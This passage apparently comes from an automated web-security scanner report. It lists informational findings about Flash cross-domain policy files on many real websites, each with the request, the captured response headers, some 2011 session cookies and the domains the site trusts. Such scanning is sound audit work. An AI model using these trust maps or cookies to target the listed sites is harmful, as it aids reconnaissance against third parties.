Last-Modified: Thu, 17 Mar 2011 05:43:23 GMT
ETag: "1579160-162-49ea723ba94c0"
Accept-Ranges: bytes
Content-Length: 354
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="kazaa.com"/>
<allow-access-from domain="stage.kazaa.com"/>
...[SNIP]...
<allow-access-from domain="www.stage.kazaa.com"/>
...[SNIP]...
7.520. http://www.kodak.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kodak.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kodak.com

Response

HTTP/1.0 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Length: 317
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:42:08 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="download.kodak.com" />
<allow-access-from domain="pgatour.com" />
<allow-access-from domain="i.cdn.turner.com" />
...[SNIP]...
7.521. http://www.livejournal.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livejournal.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.livejournal.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-AWS-Id: ws08
Last-Modified: Thu, 17 Mar 2011 16:39:44 GMT
ETag: "458fbb-26b-49eb04f04f400"
Keep-Alive: timeout=30, max=100
Content-Type: text/xml
X-Debug: USen (null) (null)
X-VWS-Id: bil1-varn08
Content-Length: 619
Date: Sat, 02 Apr 2011 13:26:47 GMT
X-Varnish: 888943455 884829416
Age: 36787
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-coss-domain-polic
...[SNIP]...
<allow-access-from domain="wh.lj.ru"/>
<allow-access-from domain="ljaqua.wh.lj.ru"/>
<allow-access-from domain="swfplayer.services.livejournal.com"/>
<allow-access-from domain="player.livejournal.ru"/>
<allow-access-from domain="player.championat.net"/>
<allow-access-from domain="player.gazeta.ru"/>
<allow-access-from domain="player.quto.ru"/>
...[SNIP]...
7.522. http://www.loc.gov/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.loc.gov
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.loc.gov

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:52:49 GMT
Server: Apache
Last-Modified: Sat, 08 Jan 2011 01:08:58 GMT
ETag: "591a-df-61211e80"
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="cdn.loc.gov" to-ports="80"/>

...[SNIP]...
7.523. http://www.lowfares.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lowfares.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.lowfares.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:41 GMT
Server: Apache/2.0.52 (CentOS)
Set-Cookie: browser_info=non_mobile%3Aunknown%3Aunknown%3Adefault; path=/; expires=Thu, 07-Apr-2011 14:05:41 GMT
Set-Cookie: sid=1; path=/; expires=Tue, 01-Apr-2014 14:05:41 GMT
Set-Cookie: pageview=0; path=/; expires=Sat, 02-Apr-2011 15:05:41 GMT
Set-Cookie: lowfares=zA2gPjUtl01RBwsAAA; domain=.lowfares.com; path=/; expires=Tue, 01-Apr-2014 14:05:41 GMT
Content-Length: 140
P3P: policyref="/static/policy.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close

<cross-domain-policy>
<allow-access-from domain="www.imageality.com"></allow-access-from>
</cross-domain-policy>
<!-- page_complete -->
7.524. http://www.lyricsmode.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lyricsmode.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.lyricsmode.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:26:28 GMT
Content-Type: text/xml
Content-Length: 119
Last-Modified: Mon, 22 Oct 2007 13:08:20 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?><cross-domain-policy>    <allow-access-from domain="widget.lyricsmode.com"/></cross-domain-policy>
7.525. http://www.marriott.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marriott.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marriott.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server/6.1.0.33 Apache/2.0.47 (Unix) DAV/2
Last-Modified: Wed, 03 Mar 2010 20:37:16 GMT
ETag: "15-354-72a61700"
Accept-Ranges: bytes
Content-Length: 852
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/xml
Cache-Control: max-age=4204
Expires: Sat, 02 Apr 2011 14:43:37 GMT
Date: Sat, 02 Apr 2011 13:33:33 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="cache.mi-perftest1.com"/>
   <allow-access-from domain="www.mi-perftest1.com"/>
   <allow-access-from domain="cache.marriott.com"/>
...[SNIP]...
<allow-access-from domain="www.marriott.de"/>
   <allow-access-from domain="www.marriott.fr"/>
...[SNIP]...
<allow-access-from domain="www.marriotthotels.co.kr"/>
   <allow-access-from domain="www.latinoamerica.marriott.com"/>
...[SNIP]...
7.526. http://www.michaels.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.michaels.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.michaels.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:19 GMT
Server: Demandware eCommerce Server
Content-Length: 288
Cache-Control: public;max-age=55864
Expires: Sun, 03 Apr 2011 05:11:23 GMT
Last-Modified: Thu, 31 Mar 2011 21:49:51 GMT
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="demandware.edgesuite.net" />
<allow-access-from domain="michaels.liquifire.com" />
...[SNIP]...
7.527. http://www.mlive.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mlive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mlive.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 166
Content-Type: text/xml
ETag: "3bb77-a6-4867f740fbe40"
P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM'
Cache-Control: max-age=1
Expires: Sat, 02 Apr 2011 14:00:26 GMT
Date: Sat, 02 Apr 2011 14:00:25 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="businessfinder.mlive.com"/>
<site-control permitted-cross-domain-policies="all" />
</cross-domain-policy>

7.528. http://www.motime.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motime.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.motime.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 02 Apr 2011 13:57:01 GMT
Content-Type: text/xml
Content-Length: 415
Last-Modified: Mon, 08 Mar 2010 16:30:37 GMT
Connection: close
Set-Cookie: trkdada=x3UsLk2XKy1RQzT1A0HJAg==; expires=Sun, 01-Apr-12 13:57:01 GMT; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
   <allow-access-from domain="img.dada.net" to-ports="*"/>
   <allow-access-from domain="s.motime.com" to-ports="*"/>
   <allow-access-from domain="s.play.me" to-ports="*"/>
   <allow-access-from domain="new.playme.com" to-ports="*"/>
   <allow-access-from domain="img.playme.com" to-ports="*"/>
...[SNIP]...
7.529. http://www.movietickets.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.movietickets.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.movietickets.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 11 Dec 2007 22:58:11 GMT
Accept-Ranges: bytes
ETag: "8d40b84d493cc81:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:36:32 GMT
Connection: close
Content-Length: 220

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="movietickets.com" />
</
...[SNIP]...
7.530. http://www.orbitz.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.orbitz.com

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 28 Mar 2011 17:17:11 GMT
ETag: "2b8-49f8e1d3493c0"
Content-Type: text/xml
Content-Length: 696
Server: Apache
Date: Sat, 02 Apr 2011 13:33:54 GMT
Age: 7467
Connection: keep-alive
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

<cross-domain-policy>
   <allow-access-from domain="media.pointroll.com"/>
   <allow-access-from domain="www.pointroll.com"/>
   <allow-access-from domain="submit.pointroll.com"/>
   <allow-access-from domain="data.pointroll.com"/>
   <allow-access-from domain="speed.pointroll.com"/>
   <allow-access-from domain="mirror.pointroll.com"/>
   <allow-access-from domain="mx.pointroll.com"/>
   <allow-access-from domain="geo.pointroll.com"/>
   <allow-access-from domain="ll.pointroll.com"/>
   <allow-access-from domain="clk.pointroll.com"/>
   <allow-access-from domain="clients.pointroll.com"/>
   <allow-access-from domain="fdaf.pointroll.com"/>
   <allow-access-from domain="demo.pointroll.net"/>
...[SNIP]...
7.531. http://www.panoramio.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.panoramio.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.panoramio.com

Response

HTTP/1.0 200 OK
Expires: Sat, 02 Apr 2011 17:55:24 GMT
Content-Type: text/x-cross-domain-policy
Date: Fri, 01 Apr 2011 17:55:24 GMT
Server: Google Frontend
Cache-Control: public, max-age=86400
Age: 70936

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="by-conte
...[SNIP]...
<allow-access-from domain="www.porsche.com" />
<allow-access-from domain="flash.porsche.com" />
<allow-access-from domain="gmaps-samples-flash.googlecode.com" />
...[SNIP]...
7.532. http://www.phoenix.edu/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phoenix.edu
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.phoenix.edu

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:56 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 639
Last-Modified: Fri, 29 Jan 2010 00:33:04 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="phoenix.edu" />
...[SNIP]...
<allow-access-from domain="beta.phoenix.edu" />
   <allow-access-from domain="iamaphoenix.phoenix.edu" />
   <allow-access-from domain="cdn-static.phoenix.edu" />
   <allow-access-from domain="rfi.phoenix.edu" />
   <allow-access-from domain="ws.aptimus.com" />
   <allow-access-from domain="network.aptimus.com" />
...[SNIP]...
7.533. http://www.playdom.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.playdom.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.playdom.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:41:53 GMT
Content-Type: application/xml
Connection: close
ETag: W/"219-1296759480000"
Last-Modified: Thu, 03 Feb 2011 18:58:00 GMT
Content-Length: 219

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="cdn0.mobwarsapp.com" />
</cr
...[SNIP]...
7.534. http://www.regions.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.regions.com

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-http=R1402696235; path=/
Content-Length: 1000
Content-Type: text/xml
Last-Modified: Tue, 23 Feb 2010 15:52:47 GMT
Accept-Ranges: bytes
ETag: "3b38bf3ea0b4ca1:83cf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:34:33 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.luckie.net" />
<allow-access-from domain="luckie.net" />
<allow-access-from domain="media.pointroll.com"/>
<allow-access-from domain="www.pointroll.com"/>
<allow-access-from domain="submit.pointroll.com"/>
<allow-access-from domain="data.pointroll.com"/>
<allow-access-from domain="speed.pointroll.com"/>
<allow-access-from domain="mirror.pointroll.com"/>
<allow-access-from domain="mx.pointroll.com"/>
<allow-access-from domain="geo.pointroll.com"/>
<allow-access-from domain="ll.pointroll.com"/>
<allow-access-from domain="clk.pointroll.com"/>
<allow-access-from domain="clients.pointroll.com"/>
<allow-access-from domain="fdaf.pointroll.com"/>
<allow-access-from domain="demo.pointroll.net"/>
...[SNIP]...
7.535. http://www.rr.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rr.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.rr.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:54 GMT
Server: Apache
Last-Modified: Mon, 04 Jan 2010 21:29:25 GMT
ETag: "1b67-760-6a5b1740"
Accept-Ranges: bytes
Content-Length: 1888
Keep-Alive: timeout=3, max=384
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.rr.com" secure="false
...[SNIP]...
<allow-access-from domain="quantum.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="hercules.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="broker.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="content.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="cmarsh.webapps.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.life.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="img.timeinc.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="img3.timeinc.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="dev.webapps.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="npaci.webapps.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="mmink.webapps.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="smadden.webapps.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="emitchell.webapps.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="qa06.webapps.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="consult06.webapps.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="consult07.webapps.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="consult08.webapps.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="consult09.webapps.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="kpisz.webapps.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="lmansfield.webapps.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="tconley.webapps.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="tnguyen.webapps.rr.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="img3.allyou.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="video.rr.com" secure="false"/>
...[SNIP]...
7.536. http://www.sacbee.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sacbee.com

Response

HTTP/1.0 200 OK
Server: Apache/1.3.41
Last-Modified: Thu, 20 Sep 2007 14:43:32 GMT
ETag: "15a42fa-1b6-46f28714"
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:40:45 GMT
Content-Length: 438
Connection: close

<cross-domain-policy>
<allow-access-from domain="www.sacbee.com"/>
<allow-access-from domain="media.sacbee.com"/>
<allow-access-from domain="data.sacbee.com"/>
<allow-access-from domain="dwb.sacbee.com"/>
<allow-access-from domain="sports.sacbee.com"/>
<allow-access-from domain="preview.sacbee.com"/>
<allow-access-from domain="sacbee.com"/>
<allow-access-from domain="newsroom-static.mcclatchyinteractive.com" />
...[SNIP]...
7.537. http://www.sharebuilder.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sharebuilder.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sharebuilder.com

Response

HTTP/1.1 200 OK
Content-Length: 228
Content-Type: text/xml
Content-Location: http://www.sharebuilder.com/crossdomain.xml
Last-Modified: Tue, 08 Mar 2011 23:22:08 GMT
Accept-Ranges: bytes
ETag: "050aaa4e7ddcb1:6af"
Server: Microsoft-IIS/6.0
Set-Cookie: TLTHID=9DCFD617433D593E5722499674DAD3B6; Path=/; Domain=.sharebuilder.com
Set-Cookie: TLTSID=9DCFD617433D593E5722499674DAD3B6; Path=/; Domain=.sharebuilder.com
HostName: A103
Date: Sat, 02 Apr 2011 13:43:02 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="content.sharebuilder.com" />
...[SNIP]...
7.538. http://www.stltoday.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stltoday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.stltoday.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2012780
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 02 Apr 2011 13:40:27 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.7
X-TNCMS-Render-Time: 0.0227
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
X-Cache-Info: caching
Real-Hostname: stltoday.com
X-TNCMS-Served-By: cmsapp2
Content-Length: 315

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM
               "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="bloximages.newyork1.vip.townnews.com" to-ports="80" secure="false"/>
...[SNIP]...
7.539. http://www.stlyrics.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stlyrics.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.stlyrics.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:06:34 GMT
Server: Apache/2.0.55
Last-Modified: Wed, 28 May 2008 05:00:00 GMT
ETag: "e0037-61-48eb5400"
Accept-Ranges: bytes
Content-Length: 97
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<allow-access-from domain="lyrics.stlyrics.com" />
</cross-domain-policy>
7.540. http://www.talkingpointsmemo.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.talkingpointsmemo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.talkingpointsmemo.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:51:51 GMT
Keep-Alive: timeout=10, max=981
Accept-Ranges: bytes
ETag: "f2c002-174-4764d0fc57200"
Connection: close
Last-Modified: Mon, 19 Oct 2009 17:27:36 GMT
Content-Length: 372

<cross-domain-policy>
<allow-access-from domain="www.rockthatproject.com"/>
<allow-access-from domain="rockthatproject.com"/>
<allow-access-from domain="ec2-67-202-52-64.compute-1.amazonaws.com"/>
<al
...[SNIP]...
<allow-access-from domain="talkingpointsmemo.com"/>
<allow-access-from domain="michiko23.com"/>
...[SNIP]...
7.541. http://www.tamu.edu/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tamu.edu
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tamu.edu

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:03:47 GMT
Server: Apache/2.2.10 (Linux/SUSE)
Last-Modified: Wed, 15 Dec 2010 14:47:16 GMT
ETag: "23-101-4977403682500"
Accept-Ranges: bytes
Content-Length: 257
Keep-Alive: timeout=15, max=55
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.tamu.edu" />
<allow-access-from domain="tamu.edu" />
...[SNIP]...
7.542. http://www.thisis50.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thisis50.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thisis50.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:20 GMT
Server: Jetty/5.1.15 (SunOS/5.10 x86 java/1.6.0_03
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: xn_visitor=26f85903-1e9a-45e2-9746-20ff67741dc8;Path=/;Domain=.thisis50.com;Expires=Tue, 30-Mar-21 14:10:20 GMT
Set-Cookie: ning_session=4w28PxsoeUA6/T0n/MTopmnkbxuwlNL/BUCzkXTQGFgXLNhzOvppdenwA2oaNYNBu95PCqf4kTA=;Path=/;Domain=.thisis50.com;Expires=Sat, 02-Apr-11 15:10:20 GMT
X-XN-Trace-Token: 5dc22b78-4420-49e1-b416-00be1445c046
ETag: "7d09c-160-49d5e5d247680"
Date: Sat, 02 Apr 2011 13:40:40 GMT
Date: Sat, 02 Apr 2011 13:40:40 GMT
Vary: X-XN_APPLICATION
P3P: CP="UNI STA LOC CURa OURa COR ALL IND"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Expires: Fri, 02 Apr 2021 01:40:40 GMT
Last-Modified: Mon, 28 Feb 2011 21:28:42 GMT
CACHE-CONTROL: max-age=315576000
CACHE-CONTROL: no-cache="Set-Cookie"
Content-Type: application/xml
Accept-Ranges: bytes
Server: Ning HTTP Server 2.0
Content-Length: 352
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="static.ning.com"/>
<allow-access-from domain="c2.static.ning.com"/>
<allow-access-from domain="static.xna.ningops.net"/>
<allow-access-from domain="c2.static.xna.ningops.net"/>
...[SNIP]...
7.543. http://www.thomasnet.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
